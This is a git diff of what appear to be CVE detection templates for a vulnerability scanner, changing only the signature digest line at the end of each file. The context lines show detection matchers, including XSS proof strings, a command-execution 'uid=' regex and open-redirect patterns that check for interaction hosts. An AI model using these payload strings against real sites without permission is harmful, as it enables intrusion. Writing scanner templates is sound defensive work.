+++ b/http/cves/2021/CVE-2021-46419.yaml @@ -49,4 +49,4 @@ http: - 'status_code_1 == 201 && status_code_2 == 204' - 'contains(server_1, "lighttpd")' condition: and -# digest: 4a0a00473045022100c226c1fb02ad38b6698fbaca5442c78e16857059ef713a16f411c95850c896370220138afd2c8d0ef04cbb746e6c3ec8ddbae0222a0a3b376bb97b192ca166060a7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100836f459243054ed4599e1a550348930f61760c782d08b4b777531b594cadf30602210092fc02dd2d5f6bdb18b684a79cbc91bd12d4c85f4bdb4a080e9c8f46d9ebdd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 3b3bfe8dce..5768c58dbf 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -51,4 +51,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a0046304402202cf5006fe50de8196c788f6260513296879638ade74bb41ece092fc0ca6b3d4902205091b956a64612033dca0ac0b60c00613584b52d7921e9568c260edace05d50f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d34c19cc3ff517e6929ddceaa6987ca8b1b9e84df462fbabff39b28205494f2022100e4f6215e29a91c4ec4400ec9b520219b232bef32f9b7a9376131d38b1a427af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index f1d576e1e3..51307d001c 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -49,4 +49,4 @@ http: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" -# digest: 4a0a004730450221009d270c5f4ca3ebb0ecffa66f1be4389e9dfea415dd3f34c629b79075cb63c8ed02200f56a6bd33139269c0e0c259baf2e964cc9fa165a986c54c00d8a929f10bc1be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f56f78cdf75e21107ee40468318d47fdcd9f03e1677885c3f34ffedf96d52c38022100cb63934ffb047fab79222824aecba25718240aaf3af82a3449485e672286a86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index e88a259ec2..235e91b304 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -59,4 +59,4 @@ http: regex: - uid=(\d+)\((\w+)\) part: body -# digest: 4a0a0047304502200c44eb70f9a64a32a520113de7752489c2a55bfe04ac78ab2aa36134bda2d664022100b46f6895973bac550934084fad2f74c8c2a6bec6bb1a93708c913c9b5201b0ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c48413ebe1c771ce04661c715f0d38a651b134d2eee3ec668769d473ec9bb29b02203c4793a9acb4f5bc01be66bd04d169007c3b8046d68d79073378e0e10ebba3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 92add31637..2291486a9a 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -44,4 +44,4 @@ http: part: body words: - "alert(document.cookie)" -# digest: 4b0a00483046022100e593d1ea8f11a2fda9ec11684b2de65075fb4cbc4d35af4986961bff299afd37022100b11d0e7dc901eda32e6a5b1f2958f5976f72bd1dd3cb87d7dbc29c05b8031a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c140ee61632dc67c9acc81a49ec451a15bb40801fed7f1b72d892508b42222ed022100e1b0b356f74b2f34f558cb407535b0fdecfbcdaaa934de641550cb0f2e1a290e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 250c628b96..5b497f8348 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0b5d5f12d52008c9ccd521518e2f2fb845eb33c8d7d16186a645196aaa992a8022100f6255a9089afad7aaf09d3929f440a647bba47d81b1c23abb31319d11f49a103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008927a3c87344d4a0c158cf096cff3d45db997215a9bd2f5cf76e780a63a744e40220101f5fa872293bad21f9addad3c75908539453fc4499807b8c4718a910f4ddd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index baf2ef667d..e4cf92c4df 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b170ba0c6ad3af42bd6f70aa404652b0e6a8213f3e4f81a152225e137fb949fa022042b2e76073edf8be64e0c79747b2e2791f3b6172349bdfc3bce8a1420a03fbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200dec39282fa7d200268b3764abd8fc15194b58ed4a1e2c91b3300d210f914adc022100ccd46fac156536cab2315c0fdb2a8d1d4af81d6fb48208beb1b011c48aca86c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index c1dcb36456..3503658ffd 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202e7a4ad224a01fb7e302b35a466effdce8c1ab91a0159ee0a5aa7e2f156ff75502210090a13e099a971610a1ffc1c1d6173e1e325a337b5ce510b4e8945c909b24b5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081ed1148acdd44ce4bbb4a3af21ffeda77b9194dc5b2a29d131bcb3812cb496a0220634c9d051f8eca2b28396a98f86e111ea610b2bd2252ef78a64389c7641827b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index be44aac08e..926621cf60 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068017ddf7be5c2400f46a248bf0c445ec579815b4c6c231d87159c6f45c0712b0220785740ea591c866890cc1f536916f20bce6fb31318c47a60128dc3532771ffef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100e90f60406630b7ff81774b2c7df9d6f13402e885a0d3e9e0bc24938b6fcac163021f17ae4db2c847fd083d025aae7226bf57e2adc9a35187c510ce9ba587657cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index ea16ab5493..92319bb8f8 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cae85661ff90aec40fdee7df9ac8db1af2ce9aad8a6a63a8e22e4def5679581802207e903a6a0f9f17440e2ca63031003ad6350230998d0a6d1034c7d863b5d69ec4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af9edcd692d399d59f4ac310e4497715beac9fa92fec8cb90a04d9234c44b9c202200f8ab602cf5b277cfeb426e9e080e682f0c431588ae087a33608fd2c656c4210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index 4264c1b1e0..871144cf30 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce359a9aaf656f4bfb67f066d105d38949d5ee5e18d66309f7ceca33e7c169dc0220345570fe5a236b50b42090400eb8d83c35012b3950c2213aa348eac28720e16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040eaca71c7a6d1560bfa719ef237433bdb23da9fe984caa9db3ff9548f1268b1022100e147e0d40c3e66583872096398debdcb61c857fd731bdd0944eeacf31643d80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 9545abdff7..3d724de03e 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)")' - 'contains(body_2, "newstatpress_page")' condition: and -# digest: 4a0a0047304502210099ba38d2af5fabba77de256d432356976787d01bec7be14985866d3919cb6325022004f0622bdf1358a7fbf7c834e1883c75e961896d6a8cbecece71ae8073714d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc4ee715424f4e18be9b98f4e753983931d231793d2df0aa0c17ef809eeb436d022006ef7498d8027fd3a7c7f082b3d01a7d73dec67c39c0ee573ff22cc8b7624484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index f78d344d6d..c3778d7d7f 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204d99748942fe5de5d793f3e6dc904384b07ce40bbebc0b307d8f555f9d9dac200221009799d6f7b38150935e23aa93324479053b5262ba9b382e11421446ad0b56b91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220536da7a9178440ec3a7c2a4f36c1a896c04d6c64781c14608dd8095926256709022100f9bc7e59ea6dd62ec9e0f0ea9b0b5ba10d0c57827b69e40b9de46b13c99db5e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 81611ca0d5..84547bef16 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -52,4 +52,4 @@ http: - 'contains_all(body_2, "first name", "last name", "email")' - 'contains(content_type_2, "application/octet-stream")' condition: and -# digest: 4a0a0047304502201f3b08635497a42da9ed7bbf4edd82a7ec1a6856e83206c033a439576f7d839d022100ea25838ab24822ecbfb1aa15ec89ac82b3243f4347222c85b9f933e0693d6954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e47ac805de175bc32661b1b254018da773b76d377655e776ffd17c5bd1c2c69b0220576195e2b3c34fade0a82a5eda6b7a9ee898580086ba151d8eeb0d5112c9b816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 57e9ca5b7f..a0d4943399 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022047ee8df934777d1c36c9d513f845866fc1babd993a8337a3d330048d1e6a806f0220461356a49cfe14504d07523e992fb5f4b7010b01c2df9e5f64b50decabc043b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ebfdbdff2feb46eb8add866019e0c6acb80eee7f480d3043ba97fcc3786c0960220372aa0defda965512f20464b6e2f9efd57a7911aab279f93acc9b28f3a47fef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index b88cba58cd..84e5d11348 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207bcdd80813e3bb53a903169393ab76e55fd5ac3e02acff9fa2d8067ad6ab297b0221008bb18cbaef7d28bf2c5b4aa93fbccaded6af697a281db594c73f1fd6b0b28f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220121fab424e81a01466a4b21fafbbd52485cf994244760c19eea5e429a3783c1f022012de38a4abc996c3eb2f45dafb2824b01e4aaf301f7c0a3bd84efc13b13ba11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index 6ae3015b86..e23858ffff 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220552d3cc2790a8fb8ada853011b816e67b148be6db2063639e9518d3ebcae1762022011a0940c35ce73be7f6d5ce093eadb2afbdfc00dd05d86f7da12af5bff26c926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c111361481180f44493bd61efe5ca22aa1d543889e629e48f1c7a7be22a8e25802205fbf4063808b1e61d84458ca90b142339f86796b9b32deafab8dfa2b59ceda85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index fb165f0490..6ae4a378e1 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a1ca7cd22a56a330f431df7aac1d8932a96f61707e94e4cec22162652d6e4fb3022073e6e623e1d660731778b65b288a3bf36e832dd59d8e3eb8377199e6f4915093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cdca0024b33589ae65a832d47929fc0ca159c0df30e64a5337b4405c8ec69bc02201774a87d909975e2678aba3545b1d520a0c9a30001a790ec01dac1ff0193ef9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index bb1d52c6c2..bb4480858b 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fca2bfe6e495221d0e92c9f3f9df9e355cf1717378ce9d2fa494fbad9d699d33022100aacbe6b4cddf4c9e0d92933a671f26673d6652bbf62dbb2104f716e89dbc46c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c4a0d8a4c5da1b24b4ca73f20ed5fdee24e4c1892d4e1a075e1002fe92808f4022052cd178910e95afe13abbfb265b687f35a62b6a5abbf2c2aed83508299db6f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index c2b6fe27f2..0e34f8719d 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"data\":{\"success\":true}")' condition: and -# digest: 4a0a0047304502207d970974e1e2f467896b712cb29eb2ef26ee7fb8c68a046674535b9648cff28c022100e1d478fe2f38bd2d00ca9f58766f9b852ab2a040c835679e082544be8002bfc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066280e6a47e91352d98cb30291c051553c64ce566f4b4058a6b38c69f618dca2022100e774340b4d23c31810dcf915c1a593ca0237c07a9dfd39f79842b6feaca32ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 3125532a71..69b67c8ec6 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d31eb5fcdb5c34d9b96f1f421b53a01d4f8cdc8054ddfca92190dc846e2c1aa70220763e1ea747d0029947084e36389d8da8a4d1f790faf6f6e4442598d276caae9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007b6e8a40d0f6e3870e036d67724fb0fd08cfb74510615437a45350d356e17b0022100c9199fa07b53fc012be43bf8c94b4a8caa190a241e907da5e1f265d86ac41aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index f4219bef5e..a9ba72f2d9 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -121,4 +121,4 @@ http: regex: - ' "uuid": "(.*)"' internal: true -# digest: 4b0a00483046022100d0de9a6c1b72efadc8c02bafbcdb9ff5b63b844b20e7f91f616a531f6052cb26022100bac30bdf3623848d4e621700e6f48e61505a34bc12e9dbc46296101bc5f6cef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b774784e49a3df9cb00ce5134b63c19ea5801279d3f73fe8258a4e7bd9188229022051f7258a2efb6c517fe4b6ef37652544f75db790e763869e48c545dc779f6604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 257ba52f18..28651d8ae0 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e7e94c080632372fa5c50babf39ba7a30d8605eefd28800449f48e9c0bb3d87602210093ee0d9733e100571cf208953494af1da3728d68c8cf918a63c5d3c99cb6d529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 1af717e2a6..47f531630a 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e053c1b7ee05de6360e694dc677e8d63d3ff1f7e93d79f51b8809a143d15d129022100a8db2e359329761cce7c314fa1dee1e0309ec32e166b80b386d847eca28a6903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036b95be2c5e81b2f7f46714c33c9ef61fb51532f84b8b1dbe5a1ea0e9e8522e70220359bbe2eae61e508bced72287041dc5e1b2d9d9f7b25a2986ffefa3d037d0811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 67424235b5..4072c86f9f 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022063843a9d6d0d17eeacc243ade32cfac49f2a635d25b41e3fafdccd90b970112002207f0e156e4ecabb743fdd5d829a2d7605122b29b13215eed150e36006f502e45b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8148a58e14af15f43a223316745a7256c0cbd611ca606478f899763c39adeea022100cf0b11fdbd556d4c93bb9c9754eeb4b73d4902912ea8bd59007dfa52ca55df9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 1ef77cc8fc..fe69127c01 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acc55f7967bbabb68c2ffe874a2304fefc97e25642bf1d7c8a2140d2bedbe5b4022019f2222b53ae69dddeccd9be785e68cff2b07c8f81f0cfbbb59f12b79cf41a26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc1036c78901cabdee129666126563f672cba114ea77ee90176ecf491c3295fc02210099b857389ddc319983039ae6a0b9a26798898068cc91422ae1ed759c69e0eeb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 0990ac2f81..91c83ccdaa 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains_all(body_2, "", "ditty")' condition: and -# digest: 4a0a00473045022046175007acf992a4660b401ebdefde82ad92ff7c8c17b87d6a2905129afd98770221009a2b0ee2089dca8202844c0d6f39187acd972cc7ad9aa0c5f5e5b6bd5b1ef364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4651a3184861c8bbefb7f1a74c31c6e9527e47135d228a5a04d67cd03771316022100e8a79a6ba89389c010f02d82bca8078e990a30bcfbb116683f13564dec7ce16d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 73e28bd17a..263abc5ea6 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -38,4 +38,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 490a00463044021f597a9521b2543ac4f4806e9d6f3729cf3c8d1f439a5d8a4a25b50ea2ee9ea4022100f83f548e131b5496fda3a4afa094a39c2344535e281eccfc2463ec6eae4a2087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220127fc3532e0b16006576991cfb52e73f85a92d3d884562d2ff7d24db0f8e96fa02206c7976189f51cf6b8c7f54d25230d5354bd8fe291b5c62619006558544871684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 64051604c8..870b72f02e 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -55,4 +55,4 @@ http: part: body words: - 'id="mmursp_id" value="\">" />' -# digest: 4a0a00473045022016e69d448cdb51d0741136c370514655b3b59fbb6d1cf3a380f6ae0f7e750d3a022100e83f230b3198c39393f19898e616b7f18fdd706b693dda670dfe5964a3d7422a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000cebad815967ef072bb84784ce548a35391e4673c793d31f5ad3d085f5f62dd022015f171dc652bcc16e8c681a6dc8c3502d10f6cc08f732e41a3bd2e83ddd86813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 2535aa5cd5..62b50a0d98 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4b0a0048304602210092e5642c6c5b08daa4000f68a948160a1d0d924227b8332de3c7700798ae009e022100e62d7f4a81ebe088f6e4bb11a1f5804845f132125613ebb5e45f9a78e3828459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201be5e1ae5adef9aca9ac6cbfe29579d972dfd03a20e29140e9a439efe939de56022100ac808c12c9115eb6db6fe499d769a117091688e6b37dd3f332e64d6e97a1c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 4c48aa7965..ddee2e5525 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210091b62172c9f552ed6b838c32d0fb253af0500b6380039c00927350af13bd4588022100d74ef37424d0bda0c76c16f24087248e86e5e647e5a6a80879391bd635f0a0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cb8744bb8cd388cf8bb62476440ac8b97aab734459eb07a7792d1c1cf7bc94d0221009d1856acb1577ebdadad2a985c047beb2a152bd3e730d0d38d76a07e589bb3b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index e985446a6a..8ce94b566d 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e1754a9ee9845d4b7fff44b3fa86b0f357226bfe6c8e1a2188eec44df0349cc6022100821681fd1c6b34cb907739069bef0ac84c01aefb733c8bda81ee38300e2520d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100daccb815e02576ed177b2124df79c942e1d63e1d206d5d829489338a1b95b169022100f879ab199f46378879ea181f4494f79ea1d831a6312b9155023dd1149c8ac305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index d9e1a4f4a5..f256e9836c 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")' condition: and -# digest: 490a0046304402202f10885d2bb6364e5c282a802ccbac81abbf9ea045f3bd21dac4f9c5ecee380f022078a6dd5254ce2952cf0149e6244b731b7ed78c9a4ad825fdb2c697fc24a340a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dea516f929140a2e2296985cd78a610dc540408796d4ac65fb462ea4200221ec02204757fe9ea8722ca648c35531743432d486f7d889c7b60b6529123bd0d7c443bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index f465933e02..7225f2dcfa 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and -# digest: 490a00463044022006a6184e06a8bb2508ed86a39022ab8f8c89e52a6ee6b736be84fd8c1f355090022005d2a535f86a1e140b49cf1e94f2d5e08b7016c64e11b0a5ae67908a74aa59d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3691c4642ebd027767b09ea5d3f374e234b52ea9c2fc2458154fae7be2493a90220147c9b1c3754183476a4091136655e1b49fdf969330a8f16c89117c6ebac5879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 1bdae5b3d5..d478f5973e 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022060a91a1d09804415e9a874c7cf72e79326f2e1d3cd4d726bf10be39e1838eb30022100c8557df40dabc252420d8129d314a31f4a47336f23651d99aad5dc9210378e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220180a6af6f155054628da56264b03a6a512f10f2023af5d0b847eaf4dcdb83da6022100990a359990fc1e0627546724c539f3751cee25a7dbbed63c9a4936295da10c9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 6907b96a3e..da9b7a80fe 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502203ccdb71fff9a5df61a3a988a74c504558a62aab20e47a587ed9499e02cf06e130221008ee594575fd03f101bfb98c81feb97f008c2c26a259bab06eb78c42981ce53a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 